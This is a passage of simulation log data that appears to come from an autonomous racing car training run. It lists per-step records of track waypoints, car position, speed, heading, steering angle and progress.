2.3671952090825386), (8.538760870928513, 2.563413656113056), (8.537808603483967, 2.75963888567523), (8.532572489045293, 2.95569387369283), (8.51481039514374, 3.15055503924561), (8.475491090199, 3.341414414227855), (8.407975057079398, 3.5247578720951225), (8.31106120632191, 3.693881267878382), (8.186502531679764, 3.844170542185153), (8.037129092933212, 3.969503006795976), (7.868136309330993, 4.066595722602571), (7.6851610460393545, 4.1345014606124835), (7.494133948738579, 4.175703983918254), (7.299554742716083, 4.195335731117524), (7.103587636930088, 4.201242347257079), (6.907607353654015, 4.201247579495785), (6.711783262392657, 4.199924210676329), (6.516154120469764, 4.199300605337186), (6.3205893157042965, 4.199124065727503), (6.125061330396392, 4.199215533011554), (5.929553692683456, 4.199390716114905), (5.734056325661314, 4.199555822314082), (5.538567872823634, 4.1996779078838955), (5.343080582705667, 4.199756585251109), (5.147595618027125, 4.199802318893134), (4.952113560147865, 4.199816465316303), (4.756630145762273, 4.199800962386803), (4.561147894096393, 4.19975794175744), (4.365664285924183, 4.199686628281739), (4.170183390764635, 4.199580045641426), (3.974701139098755, 4.1994405192759245), (3.779218887432876, 4.199264948599335), (3.5837366357669964, 4.199009925409058), (3.3881109820032407, 4.198595803404785), (3.3881109820032407, 4.198595803404785), (3.1927025630391057, 4.198236329227001), (2.997255774324458, 4.197737328683715), (2.801790188307791, 4.197125156755078), (2.6062952436183835, 4.195692686069265), (2.410804949807826, 4.190964292571721), (2.2150827903079318, 4.183555248776983), (2.0190451461927097, 4.16967140647651), (1.8255455254232797, 4.1381578265350925), (1.6399065197169342, 4.077816355401538), (1.4684209619443997, 3.98580995697732), (1.316564535251782, 3.863567226215878), (1.18828627180266, 3.716441712246848), (1.087181058714844, 3.5495077176822467), (1.0159622477774413, 3.3684589840609287), (0.9734102913519926, 3.178145699770326), (0.9534938958331036, 2.9834065228940503), (0.9444216541596013, 2.7872029974331767), (0.9405074066940884, 2.5907339843046135), (0.9396984929007637, 2.3942255355991335), (0.9471365077950047, 2.1980486557983383), (0.9667406161777752, 2.003330698556816), (1.008643508547042, 1.8129062776403588), (1.0777365771700467, 1.6310002804643384), (1.1746683531897695, 1.460860280079107), (1.2993533282606862, 1.3105290994160301), (1.4485447529255744, 1.1851194108376364), (1.618276541798405, 1.0898755162672418), (1.80267831683733, 1.026955253927975), (1.9950098887622332, 0.9923725057420933), (2.190220548481932, 0.9752908935522877), (2.3860145059240736, 0.9666594679897911), (2.581804490740531, 0.9621571992530031), (2.77751667022956, 0.9599051322865064), (2.973129727863096, 0.9587203451227853)], 'speed': 1.3333333333333333, 'x': 3.360318239199224, 'is_crashed': False, 'is_reversed': False, 'objects_heading': [], 'y': 0.9607014197320498, 'all_wheels_on_track': True, 'distance_from_center': 0.003189490145353297, 'objects_distance_from_center': [], 'objects_distance': [], 'closest_objects': [0, 0], 'track_width': 0.6096016069343125, 'object_in_camera': False, 'heading': 1.1534265481188193, 'objects_speed': [], 'progress': 1.9804949464177108, 'is_offtrack': False, 'objects_left_of_center': [], 'objects_location': [], 'closest_waypoints': [1, 2], 'track_length': 19.549800178858835, 'steering_angle': -10.000000000000004, 'steps': 8.0},
{'is_left_of_center': True, 'projection_distance': 0.4613673129751599, 'waypoints': [(2.973129727863096, 0.9587203451227853), (3.1686550001583385, 0.957973927514008), (3.3641587621388993, 0.957502662680531), (3.5596536099349976, 0.9571676056167091), (3.7551399311198708, 0.9569079073242543), (3.9506256709448877, 0.9566988842326032), (4.146107922610766, 0.9565304352142532), (4.341591530782978, 0.9563990236634121), (4.537073588662238, 0.9563010645276331), (4.732557196834449, 0.9562337963475989), (4.92803925471371, 0.9561973644632735), (5.123521506379589, 0.9561847441097273), (5.3190037580454685, 0.9562067146676283), (5.514486009711348, 0.9562466104877638), (5.709974462549027, 0.9563314648034498), (5.905463109173326, 0.9564632639275283), (6.10095815075604, 0.9566372843111675), (6.296465594682358, 0.956848729735553), (6.491997261936018, 0.9569796325965199), (6.6875785385640825, 0.9567336689306691), (6.883257677434614, 0.9557806263396478), (7.079130990497134, 0.9538671530427651), (7.275221344572657, 0.9543163504250318), (7.4705043835944585, 0.968040367211689), (7.662157411673801, 1.00506531126039), (7.845235769446617, 1.0715002572806311), (8.014446369208315, 1.1684281333446516), (8.165421648145468, 1.2924605804235763), (8.294117279524725, 1.4398041043387009), (8.397584218581926, 1.6056121986483556), (8.469351930116943, 1.7860276860462465), (8.511767170082862, 1.9763842816461406), (8.530750119682551, 2.1709724987464085), (8.535956778555175, 2.3671952090825386), (8.538760870928513, 2.563413656113056), (8.537808603483967, 2.75963888567523), (8.532572489045293, 2.95569387369283), (8.51481039514374, 3.15055503924561), (8.475491090199, 3.341414414227855), (8.407975057079398, 3.5247578720951225), (8.31106120632191, 3.693881267878382), (8.186502531679764, 3.844170542185153), (8.037129092933212, 3.969503006795976), (7.868136309330993, 4.066595722602571), (7.6851610460393545, 4.1345014606124835), (7.494133948738579, 4.175703983918254), (7.299554742716083, 4.195335731117524), (7.103587636930088, 4.201242347257079), (6.907607353654015, 4.201247579495785), (6.711783262392657, 4.199924210676329), (6.516154120469764, 4.199300605337186), (6.3205893157042965, 4.199124065727503), (6.125061330396392, 4.199215533011554), (5.929553692683456, 4.199390716114905), (5.734056325661314, 4.199555822314082), (5.538567872823634, 4.1996779078838955), (5.343080582705667, 4.199756585251109), (5.147595618027125, 4.199802318893134), (4.952113560147865, 4.199816465316303), (4.756630145762273, 4.199800962386803), (4.561147894096393, 4.19975794175744), (4.365664285924183, 4.199686628281739), (4.170183390764635, 4.199580045641426), (3.974701139098755, 4.1994405192759245), (3.779218887432876, 4.199264948599335), (3.5837366357669964, 4.199009925409058), (3.3881109820032407, 4.198595803404785), (3.3881109820032407, 4.198595803404785), (3.1927025630391057, 4.198236329227001), (2.997255774324458, 4.197737328683715), (2.801790188307791, 4.197125156755078), (2.6062952436183835, 4.195692686069265), (2.410804949807826, 4.190964292571721), (2.2150827903079318, 4.183555248776983), (2.0190451461927097, 4.16967140647651), (1.8255455254232797, 4.1381578265350925), (1.6399065197169342, 4.077816355401538), (1.4684209619443997, 3.98580995697732), (1.316564535251782, 3.863567226215878), (1.18828627180266, 3.716441712246848), (1.087181058714844, 3.5495077176822467), (1.0159622477774413, 3.3684589840609287), (0.9734102913519926, 3.178145699770326), (0.9534938958331036, 2.9834065228940503), (0.9444216541596013, 2.7872029974331767), (0.9405074066940884, 2.5907339843046135), (0.9396984929007637, 2.3942255355991335), (0.9471365077950047, 2.1980486557983383), (0.9667406161777752, 2.003330698556816), (1.008643508547042, 1.8129062776403588), (1.0777365771700467, 1.6310002804643384), (1.1746683531897695, 1.460860280079107), (1.2993533282606862, 1.3105290994160301), (1.4485447529255744, 1.1851194108376364), (1.618276541798405, 1.0898755162672418), (1.80267831683733, 1.026955253927975), (1.9950098887622332, 0.9923725057420933), (2.190220548481932, 0.9752908935522877), (2.3860145059240736, 0.9666594679897911), (2.581804490740531, 0.9621571992530031), (2.77751667022956, 0.9599051322865064), (2.973129727863096, 0.9587203451227853)], 'speed': 2.0, 'x': 3.434513541710265, 'is_crashed': False, 'is_reversed': False, 'objects_heading': [], 'y': 0.9682327913973465, 'all_wheels_on_track': True, 'distance_from_center': 0.010850693277073015, 'objects_distance_from_center': [], 'objects_distance': [], 'closest_objects': [0, 0], 'track_width': 0.6095861829769621, 'object_in_camera': False, 'heading': 2.4432909721626266, 'objects_speed': [], 'progress': 2.359959225946886, 'is_offtrack': False, 'objects_left_of_center': [], 'objects_location': [], 'closest_waypoints': [2, 3], 'track_length': 19.549800178858835, 'steering_angle': -30.0, 'steps': 9.0},
{'is_left_of_center': True, 'projection_distance': 0.5398379830761915, 'waypoints': [(2.973129727863096, 0.9587203451227853), (3.1686550001583385, 0.957973927514008), (3.3641587621388993, 0.957502662680531), (3.5596536099349976, 0.9571676056167091), (3.7551399311198708, 0.9569079073242543), (3.9506256709448877, 0.9566988842326032), (4.146107922610766, 0.9565304352142532), (4.341591530782978, 0.9563990236634121), (4.537073588662238, 0.9563010645276331), (4.732557196834449, 0.9562337963475989), (4.92803925471371, 0.9561973644632735), (5.123521506379589, 0.9561847441097273), (5.3190037580454685, 0.9562067146676283), (5.514486009711348, 0.9562466104877638), (5.709974462549027, 0.9563314648034498), (5.905463109173326, 0.9564632639275283), (6.10095815075604, 0.9566372843111675), (6.296465594682358, 0.956848729735553), (6.491997261936018, 0.9569796325965199), (6.6875785385640825, 0.9567336689306691), (6.883257677434614, 0.9557806263396478), (7.079130990497134, 0.9538671530427651), (7.275221344572657, 0.9543163504250318), (7.4705043835944585, 0.968040367211689), (7.662157411673801, 1.00506531126039), (7.845235769446617, 1.0715002572806311), (8.014446369208315, 1.1684281333446516), (8.165421648145468, 1.2924605804235763), (8.294117279524725, 1.4398041043387009), (8.397584218581926, 1.6056121986483556), (8.469351930116943, 1.7860276860462465), (8.511767170082862, 1.9763842816461406), (8.530750119682551, 2.1709724987464085), (8.535956778555175, 2.3671952090825386), (8.538760870928513, 2.563413656113056), (8.537808603483967, 2.75963888567523), (8.532572489045293, 2.95569387369283), (8.51481039514374, 3.15055503924561), (8.475491090199, 3.341414414227855), (8.407975057079398, 3.5247578720951225), (8.31106120632191, 3.693881267878382), (8.186502531679764, 3.844170542185153), (8.037129092933212, 3.969503006795976), (7.868136309330993, 4.066595722602571), (7.6851610460393545, 4.1345014606124835), (7.494133948738579, 4.175703983918254), (7.299554742716083, 4.195335731117524), (7.103587636930088, 4.201242347257079), (6.907607353654015, 4.201247579495785), (6.711783262392657, 4.199924210676329), (6.516154120469764, 4.199300605337186), (6.3205893157042965, 4.199124065727503), (6.125061330396392, 4.199215533011554), (5.929553692683456, 4.199390716114905), (5.734056325661314, 4.199555822314082), (5.538567872823634, 4.1996779078838955), (5.343080582705667, 4.199756585251109), (5.147595618027125, 4.199802318893134), (4.952113560147865, 4.199816465316303), (4.756630145762273, 4.199800962386803), (4.561147894096393, 4.19975794175744), (4.365664285924183, 4.199686628281739), (4.170183390764635, 4.199580045641426), (3.974701139098755, 4.1994405192759245), (3.779218887432876, 4.199264948599335), (3.5837366357669964, 4.199009925409058), (3.3881109820032407, 4.198595803404785), (3.3881109820032407, 4.198595803404785), (3.1927025630391057, 4.198236329227001), (2.997255774324458, 4.197737328683715), (2.801790188307791, 4.197125156755078), (2.6062952436183835, 4.195692686069265), (2.410804949807826, 4.190964292571721), (2.2150827903079318, 4.183555248776983), (2.0190451461927097, 4.16967140647651), (1.8255455254232797, 4.1381578265350925), (1.6399065197169342, 4.077816355401538), (1.4684209619443997, 3.98580995697732), (1.316564535251782, 3.863567226215878), (1.18828627180266, 3.716441712246848), (1.087181058714844, 3.5495077176822467), (1.0159622477774413, 3.3684589840609287), (0.9734102913519926, 3.178145699770326), (0.9534938958331036, 2.9834065228940503), (0.9444216541596013, 2.7872029974331767), (0.9405074066940884, 2.5907339843046135), (0.9396984929007637, 2.3942255355991335), (0.9471365077950047, 2.1980486557983383), (0.9667406161777752, 2.003330698556816), (1.008643508547042, 1.8129062776403588), (1.0777365771700467, 1.6310002804643384), (1.1746683531897695, 1.460860280079107), (1.2993533282606862, 1.3105290994160301), (1.4485447529255744, 1.1851194108376364), (1.618276541798405, 1.0898755162672418), (1.80267831683733, 1.026955253927975), (1.9950098887622332, 0.9923725057420933), (2.190220548481932, 0.9752908935522877), (2.3860145059240736, 0.9666594679897911), (2.581804490740531, 0.9621571992530031), (2.77751667022956, 0.9599051322865064), (2.973129727863096, 0.9587203451227853)], 'speed': 0.6666666666666666, 'x': 3.5129910650101888, 'is_crashed': False, 'is_reversed': False, 'objects_heading': [], 'y': 0.97216416392405, 'all_wheels_on_track': True, 'distance_from_center': 0.014916561834819316, 'objects_distance_from_center': [], 'objects_distance': [], 'closest_objects': [0, 0], 'track_width': 0.6096006411095111, 'object_in_camera': False, 'heading': 2.5651683948298047, 'objects_speed': [], 'progress': 2.761347830347507, 'is_offtrack': False, 'objects_left_of_center': [], 'objects_location': [], 'closest_waypoints': [2, 3], 'track_length': 19.549800178858835, 'steering_angle': -10.000000000000004, 'steps': 10.0},
{'is_left_of_center': True, 'projection_distance': 0.6396956392339029, 'waypoints': [(2.973129727863096, 0.9587203451227853), (3.1686550001583385, 0.957973927514008), (3.3641587621388993, 0.957502662680531), (3.5596536099349976, 0.9571676056167091), (3.7551399311198708, 0.9569079073242543), (3.9506256709448877, 0.9566988842326032), (4.146107922610766, 0.9565304352142532), (4.341591530782978, 0.9563990236634121), (4.537073588662238, 0.9563010645276331), (4.732557196834449, 0.9562337963475989), (4.92803925471371, 0.9561973644632735), (5.123521506379589, 0.9561847441097273), (5.3190037580454685, 0.9562067146676283), (5.514486009711348, 0.9562466104877638), (5.709974462549027, 0.9563314648034498), (5.905463109173326, 0.9564632639275283), (6.10095815075604, 0.9566372843111675), (6.296465594682358, 0.956848729735553), (6.491997261936018, 0.9569796325965199), (6.6875785385640825, 0.9567336689306691), (6.883257677434614, 0.9557806263396478), (7.079130990497134, 0.9538671530427651), (7.275221344572657, 0.9543163504250318), (7.4705043835944585, 0.968040367211689), (7.662157411673801, 1.00506531126039), (7.845235769446617, 1.0715002572806311), (8.014446369208315, 1.1684281333446516), (8.165421648145468, 1.2924605804235763), (8.294117279524725, 1.4398041043387009), (8.397584218581926, 1.6056121986483556), (8.469351930116943, 1.7860276860462465), (8.511767170082862, 1.9763842816461406), (8.530750119682551, 2.1709724987464085), (8.535956778555175, 2.3671952090825386), (8.538760870928513, 2.563413656113056), (8.537808603483967, 2.75963888567523), (8.532572489045293, 2.95569387369283), (8.51481039514374, 3.15055503924561), (8.475491090199, 3.341414414227855), (8.407975057079398, 3.5247578720951225), (8.31106120632191, 3.693881267878382), (8.186502531679764, 3.844170542185153), (8.037129092933212, 3.969503006795976), (7.868136309330993, 4.066595722602571), (7.6851610460393545, 4.1345014606124835), (7.494133948738579, 4.175703983918254), (7.299554742716083, 4.195335731117524), (7.103587636930088, 4.201242347257079), (6.907607353654015, 4.201247579495785), (6.711783262392657, 4.199924210676329), (6.516154120469764, 4.199300605337186), (6.3205893157042965, 4.199124065727503), (6.125061330396392, 4.199215533011554), (5.929553692683456, 4.199390716114905), (5.734056325661314, 4.199555822314082), (5.538567872823634, 4.1996779078838955), (5.343080582705667, 4.199756585251109), (5.147595618027125, 4.199802318893134), (4.952113560147865, 4.199816465316303), (4.756630145762273, 4.199800962386803), (4.561147894096393, 4.19975794175744), (4.365664285924183, 4.199686628281739), (4.170183390764635, 4.199580045641426), (3.974701139098755, 4.1994405192759245), (3.779218887432876, 4.199264948599335), (3.5837366357669964, 4.199009925409058), (3.3881109820032407, 4.198595803404785), (3.3881109820032407, 4.198595803404785), (3.1927025630391057, 4.198236329227001), (2.997255774324458, 4.197737328683715), (2.801790188307791, 4.197125156755078), (2.6062952436183835, 4.195692686069265), (2.410804949807826, 4.190964292571721), (2.2150827903079318, 4.183555248776983), (2.0190451461927097, 4.16967140647651), (1.8255455254232797, 4.1381578265350925), (1.6399065197169342, 4.077816355401538), (1.4684209619443997, 3.98580995697732), (1.316564535251782, 3.863567226215878), (1.18828627180266, 3.716441712246848), (1.087181058714844, 3.5495077176822467), (1.0159622477774413, 3.3684589840609287), (0.9734102913519926, 3.178145699770326), (0.9534938958331036, 2.9834065228940503), (0.9444216541596013, 2.7872029974331767), (0.9405074066940884, 2.5907339843046135), (0.9396984929007637, 2.3942255355991335), (0.9471365077950047, 2.1980486557983383), (0.9667406161777752, 2.003330698556816), (1.008643508547042, 1.8129062776403588), (1.0777365771700467, 1.6310002804643384), (1.1746683531897695, 1.460860280079107), (1.2993533282606862, 1.3105290994160301), (1.4485447529255744, 1.1851194108376364), (1.618276541798405, 1.0898755162672418), (1.80267831683733, 1.026955253927975), (1.9950098887622332, 0.9923725057420933), (2.190220548481932, 0.9752908935522877), (2.3860145059240736, 0.9666594679897911), (2.581804490740531, 0.9621571992530031), (2.77751667022956, 0.9599051322865064), (2.973129727863096, 0.9587203451227853)], 'speed': 0.6666666666666666, 'x': 3.6128402448619172, 'is_crashed': False, 'is_reversed': False, 'objects_heading': [], 'y': 0.970047571665471, 'all_wheels_on_track': True, 'distance_from_center': 0.012950611627412687, 'objects_distance_from_center': [], 'objects_distance': [], 'closest_objects': [0, 0], 'track_width': 0.6095911678188735, 'object_in_camera': False, 'heading': 1.0553793308345887, 'objects_speed': [], 'progress': 3.2721339010189485, 'is_offtrack': False, 'objects_left_of_center': [], 'objects_location': [], 'closest_waypoints': [3, 4], 'track_length': 19.549800178858835, 'steering_angle': 0.0, 'steps': 11.0},
{'is_left_of_center': True, 'projection_distance': 0.7285704934836759, 'waypoints': [(2.973129727863096, 0.9587203451227853), (3.1686550001583385, 0.957973927514008), (3.3641587621388993, 0.957502662680531), (3.5596536099349976, 0.9571676056167091), (3.7551399311198708, 0.9569079073242543), (3.9506256709448877, 0.9566988842326032), (4.146107922610766, 0.9565304352142532), (4.341591530782978, 0.9563990236634121), (4.537073588662238, 0.9563010645276331), (4.732557196834449, 0.9562337963475989), (4.92803925471371, 0.9561973644632735), (5.123521506379589, 0.9561847441097273), (5.3190037580454685, 0.9562067146676283), (5.514486009711348, 0.9562466104877638), (5.709974462549027, 0.9563314648034498), (5.905463109173326, 0.9564632639275283), (6.10095815075604, 0.9566372843111675), (6.296465594682358, 0.956848729735553), (6.491997261936018, 0.9569796325965199), (6.6875785385640825, 0.9567336689306691), (6.883257677434614, 0.9557806263396478), (7.079130990497134, 0.9538671530427651), (7.275221344572657, 0.9543163504250318), (7.4705043835944585, 0.968040367211689), (7.662157411673801, 1.00506531126039), (7.845235769446617, 1.0715002572806311), (8.014446369208315, 1.1684281333446516), (8.165421648145468, 1.2924605804235763), (8.294117279524725, 1.4398041043387009), (8.397584218581926, 1.6056121986483556), (8.469351930116943, 1.7860276860462465), (8.511767170082862, 1.9763842816461406), (8.530750119682551, 2.1709724987464085), (8.535956778555175, 2.3671952090825386), (8.538760870928513, 2.563413656113056), (8.537808603483967, 2.75963888567523), (8.532572489045293, 2.95569387369283), (8.51481039514374, 3.15055503924561), (8.475491090199, 3.341414414227855), (8.407975057079398, 3.5247578720951225), (8.31106120632191, 3.693881267878382), (8.186502531679764, 3.844170542185153), (8.037129092933212, 3.969503006795976), (7.868136309330993, 4.066595722602571), (7.6851610460393545, 4.1345014606124835), (7.494133948738579, 4.175703983918254), (7.299554742716083, 4.195335731117524), (7.103587636930088, 4.201242347257079), (6.907607353654015, 4.201247579495785), (6.711783262392657, 4.199924210676329), (6.516154120469764, 4.199300605337186), (6.3205893157042965, 4.199124065727503), (6.125061330396392, 4.199215533011554), (5.929553692683456, 4.199390716114905), (5.734056325661314, 4.199555822314082), (5.538567872823634, 4.1996779078838955), (5.343080582705667, 4.199756585251109), (5.147595618027125, 4.199802318893134), (4.952113560147865, 4.199816465316303), (4.756630145762273, 4.199800962386803), (4.561147894096393, 4.19975794175744), (4.365664285924183, 4.199686628281739), (4.170183390764635, 4.199580045641426), (3.974701139098755, 4.1994405192759245), (3.779218887432876, 4.199264948599335), (3.5837366357669964, 4.199009925409058), (3.3881109820032407, 4.198595803404785), (3.3881109820032407, 4.198595803404785), (3.1927025630391057, 4.198236329227001), (2.997255774324458, 4.197737328683715), (2.801790188307791, 4.197125156755078), (2.6062952436183835, 4.195692686069265), (2.410804949807826, 4.190964292571721), (2.2150827903079318, 4.183555248776983), (2.0190451461927097, 4.16967140647651), (1.8255455254232797, 4.1381578265350925), (1.6399065197169342, 4.077816355401538), (1.4684209619443997, 3.98580995697732), (1.316564535251782, 3.863567226215878), (1.18828627180266, 3.716441712246848), (1.087181058714844, 3.5495077176822467), (1.0159622477774413, 3.3684589840609287), (0.9734102913519926, 3.178145699770326), (0.9534938958331036, 2.9834065228940503), (0.9444216541596013, 2.7872029974331767), (0.9405074066940884, 2.5907339843046135), (0.9396984929007637, 2.3942255355991335), (0.9471365077950047, 2.1980486557983383), (0.9667406161777752, 2.003330698556816), (1.008643508547042, 1.8129062776403588), (1.0777365771700467, 1.6310002804643384), (1.1746683531897695, 1.460860280079107), (1.2993533282606862, 1.3105290994160301), (1.4485447529255744, 1.1851194108376364), (1.618276541798405, 1.0898755162672418), (1.80267831683733, 1.026955253927975), (1.9950098887622332, 0.9923725057420933), (2.190220548481932, 0.9752908935522877), (2.3860145059240736, 0.9666594679897911), (2.581804490740531, 0.9621571992530031), (2.77751667022956, 0.9599051322865064), (2.973129727863096, 0.9587203451227853)], 'speed': 1.3333333333333333, 'x': 3.7017125943659805, 'is_crashed': False, 'is_reversed': False, 'objects_heading': [], 'y': 0.9681031055656205, 'all_wheels_on_track': True, 'distance_from_center': 0.011124211652744676, 'objects_distance_from_center': [], 'objects_distance': [], 'closest_objects': [0, 0], 'track_width': 0.6095992343579433, 'object_in_camera': False, 'heading': 0.2767237291255475, 'objects_speed': [], 'progress': 3.7267413826129663, 'is_offtrack': False, 'objects_left_of_center': [], 'objects_location': [], 'closest_waypoints': [3, 4], 'track_length': 19.549800178858835, 'steering_angle': 30.0, 'steps': 12.0},
{'is_left_of_center': True, 'projection_distance': 0.8016274740696829, 'waypoints': [(2.973129727863096, 0.9587203451227853), (3.1686550001583385, 0.957973927514008), (3.3641587621388993, 0.957502662680531), (3.5596536099349976, 0.9571676056167091), (3.7551399311198708, 0.9569079073242543), (3.9506256709448877, 0.9566988842326032), (4.146107922610766, 0.9565304352142532), (4.341591530782978, 0.9563990236634121), (4.537073588662238, 0.9563010645276331), (4.732557196834449, 0.9562337963475989), (4.92803925471371, 0.9561973644632735), (5.123521506379589, 0.9561847441097273), (5.3190037580454685, 0.9562067146676283), (5.514486009711348, 0.9562466104877638), (5.709974462549027, 0.9563314648034498), (5.905463109173326, 0.9564632639275283), (6.10095815075604, 0.9566372843111675), (6.296465594682358, 0.956848729735553), (6.491997261936018, 0.9569796325965199), (6.6875785385640825, 0.9567336689306691), (6.883257677434614, 0.9557806263396478), (7.079130990497134, 0.9538671530427651), (7.275221344572657, 0.9543163504250318), (7.4705043835944585, 0.968040367211689), (7.662157411673801, 1.00506531126039), (7.845235769446617, 1.0715002572806311), (8.014446369208315, 1.1684281333446516), (8.165421648145468, 1.2924605804235763), (8.294117279524725, 1.4398041043387009), (8.397584218581926, 1.6056121986483556), (8.469351930116943, 1.7860276860462465), (8.511767170082862, 1.9763842816461406), (8.530750119682551, 2.1709724987464085), (8.535956778555175, 2.3671952090825386), (8.538760870928513, 2.563413656113056), (8.537808603483967, 2.75963888567523), (8.532572489045293, 2.95569387369283), (8.51481039514374, 3.15055503924561), (8.475491090199, 3.341414414227855), (8.407975057079398, 3.5247578720951225), (8.31106120632191, 3.693881267878382), (8.186502531679764, 3.844170542185153), (8.037129092933212, 3.969503006795976), (7.868136309330993, 4.066595722602571), (7.6851610460393545, 4.1345014606124835), (7.494133948738579, 4.175703983918254), (7.299554742716083, 4.195335731117524), (7.103587636930088, 4.201242347257079), (6.907607353654015, 4.201247579495785), (6.711783262392657, 4.199924210676329), (6.516154120469764, 4.199300605337186), (6.3205893157042965, 4.199124065727503), (6.125061330396392, 4.199215533011554), (5.929553692683456, 4.199390716114905), (5.734056325661314, 4.199555822314082), (5.538567872823634, 4.1996779078838955), (5.343080582705667, 4.199756585251109), (5.147595618027125, 4.199802318893134), (4.952113560147865, 4.199816465316303), (4.756630145762273, 4.199800962386803), (4.561147894096393, 4.19975794175744), (4.365664285924183, 4.199686628281739), (4.170183390764635, 4.199580045641426), (3.974701139098755, 4.1994405192759245), (3.779218887432876, 4.199264948599335), (3.5837366357669964, 4.199009925409058), (3.3881109820032407, 4.198595803404785), (3.3881109820032407, 4.198595803404785), (3.1927025630391057, 4.198236329227001), (2.997255774324458, 4.197737328683715), (2.801790188307791, 4.197125156755078), (2.6062952436183835, 4.195692686069265), (2.410804949807826, 4.190964292571721), (2.2150827903079318, 4.183555248776983), (2.0190451461927097, 4.16967140647651), (1.8255455254232797, 4.1381578265350925), (1.6399065197169342, 4.077816355401538), (1.4684209619443997, 3.98580995697732), (1.316564535251782, 3.863567226215878), (1.18828627180266, 3.716441712246848), (1.087181058714844, 3.5495077176822467), (1.0159622477774413, 3.3684589840609287), (0.9734102913519926, 3.178145699770326), (0.9534938958331036, 2.9834065228940503), (0.9444216541596013, 2.7872029974331767), (0.9405074066940884, 2.5907339843046135), (0.9396984929007637, 2.3942255355991335), (0.9471365077950047, 2.1980486557983383), (0.9667406161777752, 2.003330698556816), (1.008643508547042, 1.8129062776403588), (1.0777365771700467, 1.6310002804643384), (1.1746683531897695, 1.460860280079107), (1.2993533282606862, 1.3105290994160301), (1.4485447529255744, 1.1851194108376364), (1.618276541798405, 1.0898755162672418), (1.80267831683733, 1.026955253927975), (1.9950098887622332, 0.9923725057420933), (2.190220548481932, 0.9752908935522877), (2.3860145059240736, 0.9666594679897911), (2.581804490740531, 0.9621571992530031), (2.77751667022956, 0.9599051322865064), (2.973129727863096, 0.9587203451227853)], 'speed': 1.3333333333333333, 'x': 3.774765480699354, 'is_crashed': False, 'is_reversed': False, 'objects_heading': [], 'y': 0.9669335292069253, 'all_wheels_on_track': True, 'distance_from_center': 0.01004660075486568, 'objects_distance_from_center': [], 'objects_distance': [], 'closest_objects': [0, 0], 'track_width': 0.6095998714493209, 'object_in_camera': False, 'heading': -0.1052403210258782, 'objects_speed': [], 'progress': 4.100438197504255, 'is_offtrack': False, 'objects_left_of_center': [], 'objects_location': [], 'closest_waypoints': [4, 5], 'track_length': 19.549800178858835, 'steering_angle': 20.0, 'steps': 13.0},
{'is_left_of_center': True, 'projection_distance': 0.8745401089016366, 'waypoints': [(2.973129727863096, 0.9587203451227853), (3.1686550001583385, 0.957973927514008), (3.3641587621388993, 0.957502662680531), (3.5596536099349976, 0.9571676056167091), (3.7551399311198708, 0.9569079073242543), (3.9506256709448877, 0.9566988842326032), (4.146107922610766, 0.9565304352142532), (4.341591530782978, 0.9563990236634121), (4.537073588662238, 0.9563010645276331), (4.732557196834449, 0.9562337963475989), (4.92803925471371, 0.9561973644632735), (5.123521506379589, 0.9561847441097273), (5.3190037580454685, 0.9562067146676283), (5.514486009711348, 0.9562466104877638), (5.709974462549027, 0.9563314648034498), (5.905463109173326, 0.9564632639275283), (6.10095815075604, 0.9566372843111675), (6.296465594682358, 0.956848729735553), (6.491997261936018, 0.9569796325965199), (6.6875785385640825, 0.9567336689306691), (6.883257677434614, 0.9557806263396478), (7.079130990497134, 0.9538671530427651), (7.275221344572657, 0.9543163504250318), (7.4705043835944585, 0.968040367211689), (7.662157411673801, 1.00506531126039), (7.845235769446617, 1.0715002572806311), (8.014446369208315, 1.1684281333446516), (8.165421648145468, 1.2924605804235763), (8.294117279524725, 1.4398041043387009), (8.397584218581926, 1.6056121986483556), (8.469351930116943, 1.7860276860462465), (8.511767170082862, 1.9763842816461406), (8.530750119682551, 2.1709724987464085), (8.535956778555175, 2.3671952090825386), (8.538760870928513, 2.563413656113056), (8.537808603483967, 2.75963888567523), (8.532572489045293, 2.95569387369283), (8.51481039514374, 3.15055503924561), (8.475491090199, 3.341414414227855), (8.407975057079398, 3.5247578720951225), (8.31106120632191, 3.693881267878382), (8.186502531679764, 3.844170542185153), (8.037129092933212, 3.969503006795976), (7.868136309330993, 4.066595722602571), (7.6851610460393545, 4.1345014606124835), (7.494133948738579, 4.175703983918254), (7.299554742716083, 4.195335731117524), (7.103587636930088, 4.201242347257079), (6.907607353654015, 4.201247579495785), (6.711783262392657, 4.199924210676329), (6.516154120469764, 4.199300605337186), (6.3205893157042965, 4.199124065727503), (6.125061330396392, 4.199215533011554), (5.929553692683456, 4.199390716114905), (5.734056325661314, 4.199555822314082), (5.538567872823634, 4.1996779078838955), (5.343080582705667, 4.199756585251109), (5.147595618027125, 4.199802318893134), (4.952113560147865, 4.199816465316303), (4.756630145762273, 4.199800962386803), (4.561147894096393, 4.19975794175744), (4.365664285924183, 4.199686628281739), (4.170183390764635, 4.199580045641426), (3.974701139098755, 4.1994405192759245), (3.779218887432876, 4.199264948599335), (3.5837366357669964, 4.199009925409058), (3.3881109820032407, 4.198595803404785), (3.3881109820032407, 4.198595803404785), (3.1927025630391057, 4.198236329227001), (2.997255774324458, 4.197737328683715), (2.801790188307791, 4.197125156755078), (2.6062952436183835, 4.195692686069265), (2.410804949807826, 4.190964292571721), (2.2150827903079318, 4.183555248776983), (2.0190451461927097, 4.16967140647651), (1.8255455254232797, 4.1381578265350925), (1.6399065197169342, 4.077816355401538), (1.4684209619443997, 3.98580995697732), (1.316564535251782, 3.863567226215878), (1.18828627180266, 3.716441712246848), (1.087181058714844, 3.5495077176822467), (1.0159622477774413, 3.3684589840609287), (0.9734102913519926, 3.178145699770326), (0.9534938958331036, 2.9834065228940503), (0.9444216541596013, 2.7872029974331767), (0.9405074066940884, 2.5907339843046135), (0.9396984929007637, 2.3942255355991335), (0.9471365077950047, 2.1980486557983383), (0.9667406161777752, 2.003330698556816), (1.008643508547042, 1.8129062776403588), (1.0777365771700467, 1.6310002804643384), (1.1746683531897695, 1.460860280079107), (1.2993533282606862, 1.3105290994160301), (1.4485447529255744, 1.1851194108376364), (1.618276541798405, 1.0898755162672418), (1.80267831683733, 1.026955253927975), (1.9950098887622332, 0.9923725057420933), (2.190220548481932, 0.9752908935522877), (2.3860145059240736, 0.9666594679897911), (2.581804490740531, 0.9621571992530031), (2.77751667022956, 0.9599051322865064), (2.973129727863096, 0.9587203451227853)], 'speed': 1.3333333333333333, 'x': 3.8476821136791086, 'is_crashed': False, 'is_reversed': False, 'objects_heading': [], 'y': 0.9706337566148887, 'all_wheels_on_track': True, 'distance_from_center': 0.013824792099549267, 'objects_distance_from_center': [], 'objects_distance': [], 'closest_objects': [0, 0], 'track_width': 0.6095972148979683, 